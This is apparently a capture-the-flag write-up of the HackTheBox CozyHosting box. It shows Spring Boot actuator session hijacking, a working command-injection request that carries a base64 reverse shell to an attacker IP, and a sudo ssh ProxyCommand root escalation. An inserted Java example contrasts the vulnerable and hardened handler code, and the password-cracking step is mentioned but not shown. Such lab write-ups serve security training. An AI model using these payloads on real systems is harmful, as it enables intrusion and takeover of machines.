Looking at hacktricks, it states that one of the common misconfigurations of SpringBoot is the use of actuators.
With reference to this article, it states the following:
The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.
The article also provides a wordlist for directory/file fuzzing, SecLists' spring-boot.txt.
We can use this wordlist to fuzz all the possible actuator endpoints.
The sessions endpoint provides information about the application's HTTP sessions that are managed by Spring Session.
Visiting the endpoint, we get presented with a bunch of random strings with the username kanderson.
If we try to log in with any invalid credentials, we notice a JSESSIONID being created with a value similar to the random strings at /actuator/sessions.
Thus, we can work on the assumption that the random strings are actually session cookies which we can use to log in as kanderson.
Immediately we see an interesting function at the bottom which seems to be running some sort of SSH authentication in the backend.
This is further confirmed upon intercepting the request with Burp: it is revealed to be making a POST request to the endpoint /executessh, which responds with the error message Host Key Verification Failed, a common SSH error.
If we put a ; in the username parameter, we get the ssh usage output, suggesting that this parameter is vulnerable to some form of command injection.
We can thus try to execute our reverse shell payload, using base64 to reduce the number of spaces and substituting spaces with the IFS trick.
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 157
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cozyhosting.htb/admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=BC2923D993EC2C13F990C14949CAE896
Connection: close

host=127.0.0.1&username=;$(echo${IFS}L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk2LzEyMzQgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}/bin/bash${IFS})
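Added example, not code from this writeup or from the CozyHosting application: a hypothetical handler for an endpoint like /executessh, written once in the vulnerable shape the page describes (user input concatenated into a shell command) and once in a hardened form that allowlists the host and username and invokes ssh through an argument list so no shell ever parses them. The method names, patterns and ssh options are assumptions for illustration.

```java
import java.io.IOException;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical backend for an "/executessh"-style connectivity check.
public class SshCheck {
    // Allowlists: a POSIX-style username and a DNS hostname / IPv4 literal.
    // Anything else (';', '$', '(', whitespace, ...) is rejected outright.
    private static final Pattern SAFE_USER = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");
    private static final Pattern SAFE_HOST = Pattern.compile("^[A-Za-z0-9.-]{1,253}$");

    static boolean isSafe(String host, String user) {
        return SAFE_HOST.matcher(host).matches() && SAFE_USER.matcher(user).matches();
    }

    // Vulnerable shape: the request parameters are spliced into a string that
    // /bin/sh interprets, so ";" or "$(...)" in username runs as a command.
    static Process vulnerable(String host, String user) throws IOException {
        String cmd = "ssh -o ConnectTimeout=5 " + user + "@" + host + " true";
        return new ProcessBuilder("/bin/sh", "-c", cmd).start();
    }

    // Hardened: validate first, then hand ssh an argv list. ProcessBuilder
    // execs the binary directly, so shell metacharacters are never interpreted,
    // and "--" stops a value starting with "-" from being read as an ssh option.
    static Process hardened(String host, String user) throws IOException {
        if (!isSafe(host, user)) {
            throw new IllegalArgumentException("rejected host/username");
        }
        List<String> argv = List.of("ssh", "-o", "ConnectTimeout=5", "-o", "BatchMode=yes",
                                    "--", user + "@" + host, "true");
        return new ProcessBuilder(argv).redirectErrorStream(true).start();
    }

    public static void main(String[] args) {
        // The page's injection-style username fails the allowlist before any process starts.
        System.out.println(isSafe("127.0.0.1", "kanderson"));           // true
        System.out.println(isSafe("127.0.0.1", ";$(echo x|base64 -d)")); // false
    }
}
```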
Initial Access
Running whoami, we discover that we are the user app and that there is a .jar file named cloudhosting-0.0.1.jar.
We can then test for password reuse via ssh for the user josh using the cracked password, obtaining the user flag.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/CozyHosting]
└─$ ssh josh@10.10.11.230
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Sep  6 04:53:32 PM UTC 2023

  System load:           0.0185546875
  Usage of /:            58.8% of 5.42GB
  Memory usage:          51%
  Swap usage:            0%
  Processes:             337
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f41d

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Sep  6 16:48:01 2023 from 10.10.16.29
josh@cozyhosting:~$ cat user.txt
22df2ef7ff8702a965de417990f63faf
josh@cozyhosting:~$
Privilege Escalation
Using the command sudo -l, we discover that josh has the ability to run ssh as root, probably due to the insecure feature on the web application earlier.
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
We can thus reference GTFOBins to obtain a root shell.
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
6d241c85ff618d112b8b6f52edbf613d
#